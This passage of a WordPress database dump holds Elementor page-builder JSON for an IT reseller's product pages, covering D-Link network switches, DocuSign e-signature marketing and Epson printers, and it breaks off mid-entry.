Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>Virtual stacking of up to 32 units via D-link\\u2019s Single IP Management (SIM)<\\/p><p>Built-in SNMP MIB for remote Network Management Systems<\\/p><p>Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support Layer 2 Features \\u2013 IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>Virtual stacking of up to 32 units via D-link\\u2019s Single IP Management (SIM)<\\/p><p>Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support Layer 2 Features \\u2013 IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>Virtual stacking of up to 32 units via D-link\\u2019s Single IP Management (SIM)<\\/p><p>Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support Layer 2 Features \\u2013 IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"80aad36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center><p>\\u00a0<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7698,3428,'_elementor_version','2.5.14'),(7699,3428,'_elementor_edit_mode','builder'),(7702,3432,'_wp_page_template','template-fullwidth.php'),(7703,3432,'_elementor_edit_mode','builder'),(7704,3432,'_elementor_template_type','post'),(7705,3432,'_elementor_data','[{\"id\":\"961215d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"554807a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4c3e837\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Get to \\\"yes\\\" faster with DocuSign electronic signatures<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f69381\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f5716c9\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/sKoNwKcGKF0\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4db4450\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"174b5b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b72433e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/product_shot_1_2.png\",\"id\":2786}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d831cb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cf24fed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Sign. Send. Success.<\\/h2><p>Use DocuSign to complete approvals and agreements in minutes or hours\\u2014not days\\u2014from almost anywhere in the world. Quickly and securely access and sign documents. Easily upload and send documents for others to sign. Send reminders and check signing status almost any time.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fe44d7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca057e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d10c158\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Modernize your System of Agreement<\\/h2><p>Go digital beyond the signature. Save additional time, money, and errors by automating and connecting entire agreement processes. Embed electronic signing and payment requests into your existing website, portals, and applications. Use DocuSign\\u2019s pre-built integrations or APIs to connect to the systems you already use. With DocuSign, you not only get The Global Standard for eSignature\\u00ae but also the many options of a System of Agreement Platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ee4d73\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"be54357\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/product_shot_2_2.png\",\"id\":2787}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b27bdc5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4901a06\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d4ac2e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Delight customers with an easier way to do business<\\/h2><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collection\\u2014on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.<\\/p><h2>DocuSign makes your business run better<\\/h2><p>Close more deals, streamline operations and stand out from the crowd with a far better customer experience.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4e223a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3293733\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9b77d77\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Simple to implement, easy to use\\u2014customers and employees will be up and running in minutes <\\/strong>With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature, collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3cce57d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d877ca6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/keybenefits-1.png\",\"id\":2790}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"929ea92\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d6b3d6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aebc5f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/smb-keybenefits-2-2_07.png\",\"id\":2791}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"38090cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"36463a9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Works with the applications, services and devices your business already uses<\\/strong> DocuSign fits right into your existing systems so you\\u2019ll be productive, instantly. Use DocuSign with over 300 popular services like Google, Salesforce and Box, or access our award-winning app from practically any mobile device. Works with virtually any kind of document.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e02ae5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"17fbd20\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"769adff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>The reliable, globally-trusted service for electronic signatures<\\/strong><br \\/>Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"55c966b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1ad9333\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/SMB.png\",\"id\":2792}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6134458\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"756a687\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"02b66c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Delight your customers, partners, and employees with a better way of doing business<\\/h3><p>DocuSign allows you to quickly and securely make every agreement and approval digital, from almost anywhere in the world, on practically any device. It\\u2019s simple to use and implement, so even complex workflows can be quickly automated, keeping your business moving forward, faster.<\\/p><h3>Your company\'s digital future is here<\\/h3><p>DocuSign eliminates paper and automates the agreement process, allowing companies to measure turnaround time in minutes rather than days.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f819e5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d2503c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9fdd6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7706,3432,'_elementor_version','0.4'),(7716,3446,'_wp_page_template','template-fullwidth.php'),(7717,3446,'_elementor_edit_mode','builder'),(7718,3446,'_elementor_template_type','post'),(7719,3446,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce WF-7711<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2420\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><\\/p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.<\\/p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Duplex printing up to A3 size<\\/li><li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li><li>4.3\\u201d Colour LCD Touch Panel<\\/li><li>Print, Scan, Copy Fax with ADF<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EcoTank L3150<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2421\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L120 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson M1100 Printer<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2423\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson AcuLaser C9300N<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2427\\\" 